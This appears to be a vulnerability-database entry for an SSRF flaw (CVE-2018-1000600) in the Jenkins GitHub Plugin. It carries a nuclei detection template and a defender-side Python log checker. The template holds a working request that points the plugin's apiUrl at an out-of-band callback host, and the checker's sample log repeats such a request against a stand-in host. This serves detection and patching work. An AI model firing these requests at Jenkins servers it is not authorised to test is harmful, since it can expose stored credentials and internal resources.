Jenkins GitHub Plugin <=1.29.1 - Server-Side Request Forgery

Reported 01 Jul 2026 03:36:47 by ProjectDiscovery. Type: nuclei. Source: github.com

Jenkins GitHub Plugin 1.29.1 and earlier is vulnerable to server-side request forgery, which allows unauthorized access to internal resources and potential data leakage. Upgrade to version 1.29.2 or later.

Code
id: CVE-2018-1000600

info:
  name: Jenkins GitHub Plugin <=1.29.1 - Server-Side Request Forgery
  author: geeknik
  severity: high
  description: |
    Jenkins GitHub Plugin 1.29.1 and earlier is susceptible to server-side request forgery via GitHubTokenCredentialsCreator.java, which allows attackers to leverage attacker-specified credentials IDs obtained through another method and capture the credentials stored in Jenkins.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access to internal resources, potential data leakage, and further attacks on the network.
  remediation: |
    Upgrade Jenkins GitHub Plugin to version 1.29.2 or later to mitigate the vulnerability.
  reference:
    - https://www.jenkins.io/security/advisory/2018-06-25/#SECURITY-915
    - https://devco.re/blog/2019/01/16/hacking-Jenkins-part1-play-with-dynamic-routing/
    - https://jenkins.io/security/advisory/2018-06-25/#SECURITY-915
    - https://nvd.nist.gov/vuln/detail/CVE-2018-1000600
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2018-1000600
    cwe-id: CWE-200
    epss-score: 0.90894
    epss-percentile: 0.99794
    cpe: cpe:2.3:a:jenkins:github:*:*:*:*:*:jenkins:*:*
  metadata:
    max-request: 1
    vendor: jenkins
    product: github
    framework: jenkins
  tags: cve,cve2018,jenkins,ssrf,oast,github,vkev,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.github.config.GitHubTokenCredentialsCreator/createTokenByPassword?apiUrl=http://{{interactsh-url}}"

    matchers:
      - type: word
        part: interactsh_protocol # Confirms the HTTP Interaction
        words:
          - "http"
# digest: 4b0a00483046022100bdbb777a60848b570a84e143f80273262d3c612dd3ad6200a56061d816b0382f022100a87de8985a2ea00bb8560ecf7c6f0f7f92e05119cbc9380fa5877e14e11b36f1:922c64590222798bb761d5b6d8e72950
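A defender-side complement to the template above, added here and not part of the Vulners entry or the nuclei project: a Python checker that scans Jenkins access-log lines for requests to the createTokenByPassword endpoint whose apiUrl points outside an allowlist of expected GitHub API hosts. The Apache-combined log format, the allowlist and the sample lines are constructed assumptions.

```python
import re
from urllib.parse import urlparse, parse_qs

# Form endpoint of GitHubTokenCredentialsCreator exercised by the template above.
VULN_PATH_FRAGMENT = (
    "/descriptorByName/org.jenkinsci.plugins.github.config."
    "GitHubTokenCredentialsCreator/createTokenByPassword"
)

# Hosts the plugin is legitimately expected to call (assumed allowlist;
# extend it with your GitHub Enterprise API host if you run one).
ALLOWED_API_HOSTS = {"api.github.com"}

# Apache-combined style access-log line (assumed format for Jenkins' access logger).
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

def check_line(line):
    """Return a finding dict when the line hits createTokenByPassword with an
    apiUrl outside ALLOWED_API_HOSTS, otherwise None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parsed = urlparse(m.group("target"))
    if VULN_PATH_FRAGMENT not in parsed.path:
        return None
    # parse_qs percent-decodes, so an encoded apiUrl is handled too.
    for api_url in parse_qs(parsed.query).get("apiUrl", []):
        host = urlparse(api_url).hostname
        if host and host not in ALLOWED_API_HOSTS:
            return {"src": m.group("src"), "ts": m.group("ts"),
                    "api_host": host, "status": int(m.group("status"))}
    return None

def scan(lines):
    """Run check_line over an iterable of log lines and collect findings."""
    return [f for f in (check_line(l) for l in lines) if f]

# Constructed sample lines (not real traffic).
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jul/2026:03:36:47 +0000] "GET /securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.github.config.GitHubTokenCredentialsCreator/createTokenByPassword?apiUrl=http://oast.example.invalid HTTP/1.1" 200 512',
    '10.0.0.5 - alice [01/Jul/2026:03:40:02 +0000] "GET /descriptorByName/org.jenkinsci.plugins.github.config.GitHubTokenCredentialsCreator/createTokenByPassword?apiUrl=https://api.github.com HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jul/2026:03:41:10 +0000] "GET /job/build/1/console HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Only the first sample line is reported: it targets the endpoint with an apiUrl host outside the allowlist, while the second line uses the expected GitHub API host.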


Scores (current as of 04 Feb 2026 07:00):
Vulners AI Score: 7.3 (High risk)
CVSS 2: 4.3
CVSS 3: 8.8
EPSS: 0.90894